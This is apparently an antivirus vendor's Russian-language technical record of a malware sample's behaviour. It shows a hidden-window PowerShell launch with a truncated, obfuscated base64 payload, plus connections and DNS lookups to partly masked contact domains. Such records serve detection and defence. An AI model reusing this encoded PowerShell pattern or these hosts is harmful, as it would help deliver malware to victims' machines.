Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAG4AYgBlAGEAbwBuAD0AKAAoACcAWAAnACsAJwAxADMAJwApACsAKAAnAHMAZAByACcAKwAnADkAJwApACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdABlACcAKwAnAG0AJwApACAAJABFAE4AdgA6AHUAcwBFAFIAcA...
- 'ka######oceryandgifts.com':443
- 'pu###azh.com':443
- 'ak####icgroup.com':443
- 'fi###ity.online':443
- DNS ASK ka######oceryandgifts.com
- DNS ASK pu###azh.com
- DNS ASK la####.sowilo.co.za
- DNS ASK ak####icgroup.com
- DNS ASK fi###ity.online
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAG4AYgBlAGEAbwBuAD0AKAAoACcAWAAnACsAJwAxADMAJwApACsAKAAnAHMAZAByACcAKwAnADkAJwApACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdABlACcAKwAnAG0AJwApACAAJABFAE4AdgA6AHUAcwBFAFIAcA...' (со скрытым окном)